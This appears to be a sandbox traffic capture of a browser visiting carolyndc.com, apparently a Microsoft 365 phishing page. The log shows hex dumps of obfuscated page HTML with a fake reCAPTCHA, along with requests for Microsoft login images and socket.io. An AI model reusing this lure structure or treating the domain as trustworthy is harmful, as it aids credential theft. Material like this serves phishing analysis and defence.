2024-11-07 20:04:42 UTC	8000	IN	Data Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 62 6c 6f 63 6b 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 69 64 65 42 61 72 3e 69 6d 67 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 3a 5c 78 32 30 31 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e Data Ascii: \x20\x20\x20display:\x20block;\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20.sideBar>img\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x2010px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20poin
2024-11-07 20:04:42 UTC	8000	IN	Data Raw: 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 37 63 63 30 39 36 64 61 36 61 61 32 64 62 61 33 66 38 31 66 63 63 31 63 38 32 36 32 31 35 37 63 2e 70 6e 67 5c 78 32 32 5c 78 32 30 73 76 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c Data Ascii: gsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png\x22\x20svgsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22\x0a\x20\x20\x20\x20\
2024-11-07 20:04:42 UTC	8000	IN	Data Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 61 74 61 2d 62 69 6e 64 3d 5c 78 32 32 69 6d 67 53 72 63 5c 78 32 32 5c 78 32 30 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c Data Ascii: \x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20data-bind=\x22imgSrc\x22\x20src=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
2024-11-07 20:04:42 UTC	8000	IN	Data Raw: 74 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 5c 78 32 32 3e 5c 78 32 30 2d 2d 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 73 75 62 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 Data Ascii: t\x20class=\x22recaptchacheckbox\x22\x20type=\x22checkbox\x22\x20name=\x22\x22\x20id=\x22\x22>\x20-->\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22recaptchasub\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:04:42 UTC	560	OUT	GET /4.7.5/socket.io.min.js HTTP/1.1 Host: cdn.socket.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://carolyndc.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://carolyndc.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 20:04:42 UTC	746	IN	HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Content-Length: 49993 Connection: close Accept-Ranges: bytes Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000, immutable Content-Disposition: inline; filename="socket.io.min.js" Date: Tue, 29 Oct 2024 16:20:30 GMT ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a" Last-Modified: Tue, 29 Oct 2024 16:20:30 GMT Server: Vercel Strict-Transport-Security: max-age=63072000 X-Vercel-Cache: HIT X-Vercel-Id: lhr1::5tqvx-1730218830262-96eae0a6ae9f X-Cache: Hit from cloudfront Via: 1.1 6aa6edecec0700ca349b892f43a2c0b6.cloudfront.net (CloudFront) X-Amz-Cf-Pop: LHR5-P3 X-Amz-Cf-Id: L3__bJfu5tHzew82PrLm-LirxZY9ebIzDUhrXJHf09lrNGdcvXKTxg== Age: 791052
2024-11-07 20:04:43 UTC	16384	IN	Data Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 Data Ascii: /! Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
2024-11-07 20:04:43 UTC	15596	IN	Data Raw: 66 20 64 6f 63 75 6d 65 6e 74 29 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 74 74 61 63 68 45 76 65 6e 74 29 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 75 6e 6c 6f 61 64 22 2c 61 65 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 7b 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6f 6e 70 61 67 65 68 69 64 65 22 69 6e 20 49 3f 22 70 61 67 65 68 69 64 65 22 3a 22 75 6e 6c 6f 61 64 22 2c 61 65 2c 21 31 29 7d 66 75 6e 63 74 69 6f 6e 20 61 65 28 29 7b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 73 65 2e 72 65 71 75 65 73 74 73 29 73 65 2e 72 65 71 75 65 73 74 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 65 29 26 26 73 65 2e 72 65 71 75 Data Ascii: f document)if("function"==typeof attachEvent)attachEvent("onunload",ae);else if("function"==typeof addEventListener){addEventListener("onpagehide"in I?"pagehide":"unload",ae,!1)}function ae(){for(var e in se.requests)se.requests.hasOwnProperty(e)&&se.requ
2024-11-07 20:04:43 UTC	16384	IN	Data Raw: 73 2e 65 6e 63 6f 64 65 41 73 42 69 6e 61 72 79 28 7b 74 79 70 65 3a 65 2e 74 79 70 65 3d 3d 3d 42 65 2e 45 56 45 4e 54 3f 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 3a 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 2c 6e 73 70 3a 65 2e 6e 73 70 2c 64 61 74 61 3a 65 2e 64 61 74 61 2c 69 64 3a 65 2e 69 64 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 65 6e 63 6f 64 65 41 73 53 74 72 69 6e 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 22 2b 65 2e 74 79 70 65 3b 72 65 74 75 72 6e 20 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 26 26 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 7c 7c 28 74 2b 3d 65 2e 61 74 74 61 63 68 6d 65 6e 74 73 2b 22 2d 22 29 2c 65 2e 6e 73 70 26 26 22 2f 22 21 3d 3d 65 Data Ascii: s.encodeAsBinary({type:e.type===Be.EVENT?Be.BINARY_EVENT:Be.BINARY_ACK,nsp:e.nsp,data:e.data,id:e.id})}},{key:"encodeAsString",value:function(e){var t=""+e.type;return e.type!==Be.BINARY_EVENT&&e.type!==Be.BINARY_ACK\|\|(t+=e.attachments+"-"),e.nsp&&"/"!==e
2024-11-07 20:04:43 UTC	1629	IN	Data Raw: 5f 72 65 63 6f 6e 6e 65 63 74 69 6e 67 3d 21 31 3b 65 6c 73 65 7b 76 61 72 20 6e 3d 74 68 69 73 2e 62 61 63 6b 6f 66 66 2e 64 75 72 61 74 69 6f 6e 28 29 3b 74 68 69 73 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6e 67 3d 21 30 3b 76 61 72 20 72 3d 74 68 69 73 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 28 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 61 74 74 65 6d 70 74 22 2c 74 2e 62 61 63 6b 6f 66 66 2e 61 74 74 65 6d 70 74 73 29 2c 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 74 2e 6f 70 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 3f 28 74 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6e 67 3d 21 31 2c 74 2e 72 65 63 6f 6e 6e 65 63 74 28 29 Data Ascii: _reconnecting=!1;else{var n=this.backoff.duration();this._reconnecting=!0;var r=this.setTimeoutFn((function(){t.skipReconnect\|\|(e.emitReserved("reconnect_attempt",t.backoff.attempts),t.skipReconnect\|\|t.open((function(n){n?(t._reconnecting=!1,t.reconnect()

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:04:43 UTC	651	OUT	GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://carolyndc.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 20:04:44 UTC	779	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 20:04:44 GMT Content-Type: image/svg+xml Content-Length: 1435 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 24 May 2023 10:11:48 GMT ETag: 0x8DB5C3F4911527F x-ms-request-id: 85b62c88-d01e-004f-0f0b-31c5bd000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20241107T200444Z-15869dbbcc6b2ncxhC1DFW2ztg00000002b0000000006yh9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 20:04:44 UTC	1435	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5 Data Ascii: WMo7+uVHJ{&v(QFaWQ\|~\|{~b{8zv8\|bgxby{x<\lSppl7o}vtrr\|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:04:43 UTC	663	OUT	GET /favicon.ico HTTP/1.1 Host: carolyndc.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 20:04:44 UTC	382	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 20:04:44 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=94c3ea08538b22fd36abf330e372a1c3; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-11-07 20:04:44 UTC	479	IN	Data Raw: 31 64 33 0d 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 70 61 64 64 69 6e 67 3a 31 30 70 78 7d 0a 20 20 20 20 20 20 69 6e 70 75 74 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 70 78 3b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a Data Ascii: 1d3<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body>

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:04:43 UTC	671	OUT	GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://carolyndc.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 20:04:44 UTC	779	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 20:04:44 GMT Content-Type: image/svg+xml Content-Length: 2407 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 24 May 2023 10:11:49 GMT ETag: 0x8DB5C3F499A9B99 x-ms-request-id: 8b1aa717-f01e-0053-0341-30dfcf000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20241107T200444Z-15869dbbcc6xpvqthC1DFWq7d8000000023g00000000apy1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 20:04:44 UTC	2407	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04 Data Ascii: Y=s8mrfy8RlNkl?{$l\|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx\|\|y=/3kN2H;<sy

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:04:44 UTC	650	OUT	GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://carolyndc.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 20:04:44 UTC	778	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 20:04:44 GMT Content-Type: image/svg+xml Content-Length: 673 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 24 May 2023 10:11:46 GMT ETag: 0x8DB5C3F47E260FD x-ms-request-id: 70daa0fa-801e-0020-02a5-2ccf4e000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20241107T200444Z-16547b76f7f76p6chC1DFWctqw00000008rg00000000bskv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 20:04:44 UTC	673	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41 Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1#vGal9!9A

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:04:44 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-07 20:04:44 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/0790) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=39593 Date: Thu, 07 Nov 2024 20:04:44 GMT Connection: close X-CID: 2

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:04:44 UTC	542	OUT	GET /w3css/4/w3.css HTTP/1.1 Host: www.w3schools.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://carolyndc.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 20:04:44 UTC	581	IN	HTTP/1.1 200 OK Age: 548665 Cache-Control: public,max-age=31536000,public Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com; Content-Type: text/css Date: Thu, 07 Nov 2024 20:04:44 GMT Etag: "0a5fddf412cdb1:0+gzip+ident" Last-Modified: Fri, 01 Nov 2024 09:38:58 GMT Server: ECS (lhd/35B3) Vary: Accept-Encoding X-Cache: HIT X-Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com; X-Powered-By: ASP.NET Content-Length: 23427 Connection: close
2024-11-07 20:04:44 UTC	16383	IN	Data Raw: ef bb bf 2f 2a 20 57 33 2e 43 53 53 20 34 2e 31 35 20 44 65 63 65 6d 62 65 72 20 32 30 32 30 20 62 79 20 4a 61 6e 20 45 67 69 6c 20 61 6e 64 20 42 6f 72 67 65 20 52 65 66 73 6e 65 73 20 2a 2f 0a 68 74 6d 6c 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2a 2c 2a 3a 62 65 66 6f 72 65 2c 2a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 0a 2f 2a 20 45 78 74 72 61 63 74 20 66 72 6f 6d 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 62 79 20 4e 69 63 6f 6c 61 73 20 47 61 6c 6c 61 67 68 65 72 20 61 6e 64 20 4a 6f 6e 61 74 68 61 6e 20 4e 65 61 6c 20 67 69 74 2e 69 6f 2f 6e 6f 72 6d 61 6c 69 7a 65 20 2a 2f 0a 68 74 6d 6c 7b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 Data Ascii: /* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes 